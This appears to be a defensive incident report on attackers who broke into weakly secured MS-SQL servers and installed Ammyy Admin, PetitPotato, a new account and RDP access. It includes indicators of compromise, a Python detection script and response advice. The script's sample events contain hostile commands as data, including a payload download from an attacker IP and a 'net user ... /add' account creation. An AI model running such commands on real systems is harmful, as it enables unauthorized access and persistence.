Full Report
AhnLab SEcurity intelligence Center (ASEC) recently identified cases of attacks installing Ammyy Admin on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool used to control systems remotely along with AnyDesk, ToDesk, TeamViewer, etc. When these tools are used properly, they enable companies and individuals to manage and control systems remotely. However, […]
Analysis Summary
# Incident Report: Installation of Ammyy Admin on Compromised MS-SQL Servers
## Executive Summary
Threat actors targeted poorly managed, publicly exposed MS-SQL servers and used weak credentials to gain initial access. Once inside, they installed the legitimate remote administration tool Ammyy Admin to keep remote control of the compromised systems and ran the PetitPotato privilege escalation tool; they also created a local user account and enabled RDP as a second access path. Taken together this points to an effort to maintain long-term access for follow-on activity, which could include data theft. Response requires immediate remediation of weak credentials and hardening of public-facing database servers.
## Incident Details
- Discovery Date: Not explicitly stated, likely concurrent with ASEC analysis.
- Incident Date: Not explicitly stated, ongoing as reported by ASEC.
- Affected Organization: Various organizations with poorly managed MS-SQL servers (unspecified).
- Sector: Unspecified (Database Servers).
- Geography: Unspecified.
## Timeline of Events
### Initial Access
- Date/Time: Precedes discovery.
- Vector: Publicly exposed MS-SQL servers, believed to have been accessed with weak credentials obtained by brute-force or dictionary guessing against SQL logins.
- Details: Attackers gained command execution on the database server under the SQL Server service context.
### Execution and Privilege Escalation
- Details: After gaining access, the attackers downloaded wget and used it to fetch and install follow-on tools, including Ammyy Admin. The privilege escalation tool PetitPotato (`p.ax`) was also deployed, indicating an attempt to move from the SQL Server service context to higher privileges on the host.
### Discovery and Persistence
- Details: The threat actors ran system information gathering commands (`whoami`, `netstat`, `wmic`). The primary impact was the installation of Ammyy Admin, which gave them persistent remote access. They also added a new user account and enabled the RDP service as an alternative remote access path. No data exfiltration was reported.
### Detection & Response
- Details: The incident was identified through analysis by the AhnLab SEcurity intelligence Center (ASEC). Response actions are not described in the source; remediation of the identified IOCs and of the underlying configuration weaknesses is implied.
## Attack Methodology
- Initial Access: Weak credentials likely via brute force/dictionary attack on MS-SQL servers.
- Persistence: Installation of Ammyy Admin under the name `mscorsvw.exe` (the filename of the legitimate .NET Runtime Optimization Service), creation of a new user account, and enabling of RDP.
- Privilege Escalation: Use of the PetitPotato tool (dropped as `p.ax`).
- Defense Evasion: Use of legitimate, trusted software (Ammyy Admin) to mask malicious remote control activity.
- Credential Access: Brute-force or dictionary guessing against MS-SQL logins, implied by the initial access vector.
- Discovery: Execution of commands like `whoami`, `net user`, `netstat -an`, and `wmic cpu get name,NumberOfCores` to map the environment.
- Lateral Movement: Not observed. Enabling RDP and adding an account give the attackers an interactive foothold from which broader network access could follow.
- Collection: System configuration and network status gathering.
- Exfiltration: Not observed or reported; the remote access channel would allow it.
- Impact: Establishment of persistent remote access control.
## Impact Assessment
- Financial: Not specified.
- Data Breach: System information gathered; potential for subsequent data theft via remote access channels.
- Operational: Potential for long-term system compromise and disruption once threat actors utilize full remote control capabilities.
- Reputational: Potentially high, especially if customer data stored on the MS-SQL servers is compromised.
## Indicators of Compromise
- Network Indicators (Defanged):
- hxxp://110.45.186[.]8/
- hxxp://1.220.228[.]82/
- File Indicators:
- Ammyy Admin executable (installed as `mscorsvw.exe`)
- Ammyy Admin settings file (`settings3.bin`)
- PetitPotato payload (`p.ax`)
- wget downloader component (`get.exe`; the filename may vary)
- Behavioral Indicators:
- Installation of legitimate remote control software (Ammyy Admin v3.10)
- Modification of the registry value `HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections` to 0 (enables RDP).
- Execution of standard system enumeration commands (`whoami`, `net user`, `netstat -an`, `wmic cpu get name,NumberOfCores`) shortly after initial compromise, followed by creation of a new local user.
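The file and behavioural indicators above translate directly into host-based detection logic. The following is an added example (not code from ASEC or the original report) that runs a small rule set over constructed, Sysmon-style process, registry and network events: `mscorsvw.exe` executing outside the .NET Framework directory, `net user ... /add`, a write of `fDenyTSConnections` to 0, the report's file names and IP addresses, and, as an assumed general rule for database servers, a shell spawned by `sqlservr.exe`. The event schema (`type`, `image`, `parent_image`, `cmdline`, `target`, `details`, `dest_ip`) is a simplified normalisation invented for the example, and the sample events are constructed.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# IOCs from the report, re-armed from the defanged form so they can be matched.
IOC_IPS = {"110.45.186.8", "1.220.228.82"}
IOC_FILENAMES = {"p.ax", "settings3.bin"}
# Legitimate location of mscorsvw.exe (.NET Runtime Optimization Service); anywhere else is masquerading.
DOTNET_DIR = "c:\\windows\\microsoft.net\\framework"
# Registry value that enables RDP when set to 0.
RDP_VALUE = "\\terminal server\\fdenytsconnections"

NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")
NET_LOCALGROUP_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\b.*\s/add\b")


def _name(path):
    """Lower-cased file name of a Windows path ('' for None)."""
    return PureWindowsPath(path or "").name.lower()


def check_event(ev):
    """Return a list of (category, detail) findings for one normalised event."""
    findings = []
    kind = ev.get("type")
    if kind == "process":
        image = (ev.get("image") or "").lower()
        cmd = (ev.get("cmdline") or "").lower()
        name = _name(image)
        if name == "mscorsvw.exe" and not image.startswith(DOTNET_DIR):
            findings.append(("masquerade", f"mscorsvw.exe outside the .NET directory: {ev['image']}"))
        if NET_USER_ADD.search(cmd):
            findings.append(("new_local_user", ev["cmdline"]))
        if NET_LOCALGROUP_ADD.search(cmd):
            findings.append(("admin_group_add", ev["cmdline"]))
        if name in IOC_FILENAMES or any(f in cmd for f in IOC_FILENAMES):
            findings.append(("ioc_file", ev["cmdline"]))
        if any(ip in cmd for ip in IOC_IPS):
            findings.append(("ioc_url", ev["cmdline"]))
        # Assumption: on a database server the SQL Server service process should never spawn a shell.
        if _name(ev.get("parent_image")) == "sqlservr.exe" and name in {"cmd.exe", "powershell.exe"}:
            findings.append(("sql_spawned_shell", ev["cmdline"]))
    elif kind == "registry":
        target = (ev.get("target") or "").lower()
        details = (ev.get("details") or "").lower()   # Sysmon event 13 renders DWORDs as "DWORD (0x00000000)"
        if target.endswith(RDP_VALUE) and details in {"dword (0x00000000)", "0"}:
            findings.append(("rdp_enabled", ev["target"]))
    elif kind == "network":
        if ev.get("dest_ip") in IOC_IPS:
            findings.append(("ioc_ip", ev["dest_ip"]))
    return findings


def scan(events):
    """Run check_event over a list of events; returns [(event_index, category, detail), ...]."""
    return [(i, cat, detail) for i, ev in enumerate(events) for cat, detail in check_event(ev)]


def summarize(results):
    """Count findings per category for a quick triage view."""
    return Counter(cat for _, cat, _ in results)


# Constructed sample events (not real telemetry). Index 3 is the genuine .NET service and
# index 7 is ordinary DNS traffic; neither should produce a finding.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"type": "process", "image": r"C:\Users\Public\get.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "get.exe http://110.45.186.8/p.ax"},
    {"type": "process", "image": r"C:\ProgramData\mscorsvw.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mscorsvw.exe -service"},
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "cmdline": "mscorsvw.exe -StartupEvent 1234"},
    {"type": "process", "image": r"C:\Windows\System32\net.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "net user backup P@ssw0rd123 /add"},
    {"type": "registry", "target": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"type": "network", "dest_ip": "1.220.228.82", "dest_port": 443},
    {"type": "network", "dest_ip": "8.8.8.8", "dest_port": 53},
]

if __name__ == "__main__":
    for idx, cat, detail in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {cat}: {detail}")
```

The IP and file-name rules are the brittle part, since an operator can change both between campaigns; the masquerade, `fDenyTSConnections` and `sqlservr.exe`-spawns-shell rules describe the technique rather than this particular sample and are the ones worth keeping in a permanent detection set.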
## Response Actions
- Containment: Not described in the source; immediate steps would be to isolate the affected servers, block traffic to the IOC addresses, and disable the attacker-created account.
- Eradication: Remove Ammyy Admin, PetitPotato and associated files (`mscorsvw.exe`, `settings3.bin`, `p.ax`, the downloader), delete the new user account, re-disable RDP if it is not required, and reset the passwords of all MS-SQL logins; if the SQL Server service ran under a domain account, treat that account as compromised as well.
- Recovery: Rebuild or reimage affected systems from a known-good source; enforce strong passwords and add MFA on the access path used to reach the server (for example the VPN), since MS-SQL authentication itself does not provide it.
## Lessons Learned
- Legitimate remote administration tools can be turned into remote access trojans when installed without authorization, and their signed, trusted binaries are unlikely to be blocked by default.
- Poor management, specifically weak or default credentials on public-facing services such as MS-SQL, remains a primary entry vector.
- The attack did not depend on a vulnerability in Ammyy Admin; the attackers relied on the tool's legitimate remote-control functionality (version 3.10 was observed), so detection has to key on where and how the tool was installed rather than on its version.
## Recommendations
- Enforce strong, unique passwords for all database logins (including `sa`), lock out or rate-limit repeated failed logins, and rotate credentials on a regular schedule.
- Do not expose database servers directly to the public internet; restrict access with firewalls or a VPN.
- Keep MS-SQL and the underlying operating system patched and on supported versions.
- Regularly audit remote access configuration and user accounts: alert on new local users, on changes to `fDenyTSConnections`, and on remote administration software running outside its expected installation path; use application control to block unapproved remote administration tools and known privilege escalation utilities such as PetitPotato.